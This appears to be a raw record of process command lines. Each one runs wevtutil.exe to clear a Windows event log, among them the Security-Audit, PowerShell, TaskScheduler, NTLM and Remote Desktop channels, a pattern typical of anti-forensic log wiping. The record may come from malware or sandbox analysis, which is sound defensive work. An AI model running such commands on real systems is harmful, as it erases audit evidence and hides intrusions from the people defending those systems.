C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Iphlpsvc/Trace

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-Acpi/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-Boot/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-BootDiagnostics/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-Disk/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-EventTracing/Admin

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-EventTracing/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-File/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-Memory/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-Network/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-PnP/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-Power/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-Power/Thermal-Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-Power/Thermal-Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-Prefetch/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-Process/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-Processor-Power/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-Registry/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-StoreMgr/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-StoreMgr/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-WDI/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-WDI/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-WDI/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-WHEA/Errors

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-WHEA/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "Microsoft-Windows-Known Folders API Service"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-L2NA/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-LDAP-Client/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-LUA-ConsentUI/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-LanguagePackSetup/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-LanguagePackSetup/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-LanguagePackSetup/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-MCT/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-MPS-CLNT/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-MPS-DRV/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-MPS-SRV/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-MSPaint/Admin

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-MSPaint/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-MSPaint/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-MUI/Admin

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-MUI/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-MUI/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-MUI/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-MediaFoundation-MFReadWrite/SinkWriter

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-MediaFoundation-MFReadWrite/SourceReader

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-MediaFoundation-MFReadWrite/Transform

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-MediaFoundation-PlayAPI/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-MemoryDiagnostics-Results/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-MobilityCenter/Performance

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-NCSI/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-NCSI/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-NDF-HelperClassDiscovery/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-NDIS-PacketCapture/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-NDIS/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-NDIS/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-NTLM/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-NWiFi/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Narrator/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-NetShell/Performance

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Network-and-Sharing-Center/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-NetworkAccessProtection/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-NetworkAccessProtection/WHC

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-NetworkLocationWizard/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-NetworkProfile/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-NetworkProfile/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Networking-Correlation/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-NlaSvc/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-NlaSvc/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-OLEACC/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-OLEACC/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-OOBE-Machine/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-OfflineFiles/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-OfflineFiles/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-OfflineFiles/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-OfflineFiles/SyncLog

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-OneX/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-OobeLdr/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-PCI/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-ParentalControls/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-PeerToPeerDrtEventProvider/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-PeopleNearMe/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-PortableDeviceStatusProvider/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-PortableDeviceSyncProvider/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-PowerCfg/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-PowerCpl/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-PowerEfficiencyDiagnostics/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-PowerShell/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-PowerShell/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-PrimaryNetworkIcon/Performance

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-PrintService/Admin

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-PrintService/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-PrintService/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Program-Compatibility-Assistant/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-QoS-Pacer/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-QoS-qWAVE/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-RPC-Proxy/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-RPC/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-RPC/EEInfo

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-ReadyBoost/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-ReadyBoost/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-ReadyBoostDriver/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-ReadyBoostDriver/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Recovery/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-ReliabilityAnalysisComponent/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "Microsoft-Windows-RemoteApp and Desktop Connections/Admin"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-RemoteAssistance/Admin

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-RemoteAssistance/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-RemoteAssistance/Tracing

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Admin

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Remotefs-UTProvider/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Resource-Exhaustion-Detector/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Resource-Exhaustion-Resolver/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Resource-Leak-Diagnostic/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-ResourcePublication/Tracing

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-RestartManager/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Search-Core/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Search-ProtocolHandlers/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Security-Audit-Configuration-Client/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Security-Audit-Configuration-Client/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Security-IdentityListener/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Security-SPP/Perf

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Sens/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-ServiceReportingApi/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Services-Svchost/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Services/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Setup/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-SetupCl/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-SetupQueue/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-SetupUGC/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-ShareMedia-ControlPanel/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Shell-AuthUI-BootAnim/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Shell-AuthUI-Common/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Shell-AuthUI-CredUI/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Shell-AuthUI-Logon/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Shell-AuthUI-PasswordProvider/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Shell-AuthUI-Shutdown/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Shell-Core/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Shell-DefaultPrograms/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Shell-Shwebsvc

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Shell-ZipFolder/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Shsvcs/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Sidebar/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Speech-UserExperience/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Spell-Checking/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-SpellChecker/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-StickyNotes/Admin

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-StickyNotes/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-StickyNotes/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-StorDiag/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-StorPort/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Subsys-Csr/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Subsys-SMSS/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Superfetch/Main

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Superfetch/StoreLog

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Sysprep/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-SystemHealthAgent/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TCPIP/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TSF-msctf/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TSF-msctf/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TSF-msutb/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TSF-msutb/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TZUtil/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TaskScheduler/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TaskScheduler/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TaskScheduler/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TaskbarCPL/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TerminalServices-ClientUSBDevices/Admin

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TerminalServices-ClientUSBDevices/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TerminalServices-ClientUSBDevices/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TerminalServices-ClientUSBDevices/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TerminalServices-LocalSessionManager/Admin

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TerminalServices-LocalSessionManager/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TerminalServices-LocalSessionManager/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TerminalServices-LocalSessionManager/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TerminalServices-MediaRedirection/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TerminalServices-PnPDevices/Admin

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TerminalServices-PnPDevices/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TerminalServices-PnPDevices/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TerminalServices-PnPDevices/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TerminalServices-RDPClient/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TerminalServices-RDPClient/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TerminalServices-RDPClient/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TerminalServices-RdpSoundDriver/Capture

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TerminalServices-RdpSoundDriver/Playback

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TerminalServices-RemoteConnectionManager/Admin

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TerminalServices-RemoteConnectionManager/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TerminalServices-RemoteConnectionManager/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TerminalServices-ServerUSBDevices/Admin

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TerminalServices-ServerUSBDevices/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TerminalServices-ServerUSBDevices/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TerminalServices-ServerUSBDevices/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-ThemeCPL/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-ThemeUI/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TunnelDriver

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-UAC-FileVirtualization/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-UAC/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-UIAnimation/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-UIAutomationCore/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-UIAutomationCore/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-UIAutomationCore/Perf

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-UIRibbon/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-USB-USBHUB/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-USB-USBPORT/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "Microsoft-Windows-User Control Panel Performance/Diagnostic"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "Microsoft-Windows-User Profile Service/Diagnostic"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "Microsoft-Windows-User Profile Service/Operational"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-User-Loader/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-UserModePowerService/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-UserPnp/DeviceMetadata/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-UserPnp/DeviceNotifications

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-UserPnp/Performance

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-UserPnp/SchedulerOperations

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-UxTheme/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-VAN/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-VDRVROOT/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-VHDMP/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-VWiFi/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-VolumeControl/Performance

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-VolumeSnapshot-Driver/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WABSyncProvider/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WCN-Config-Registrar/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WER-Diag/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WFP/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WFP/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WLAN-AutoConfig/Operational

C:\Windows\system32\wevtutil.exe

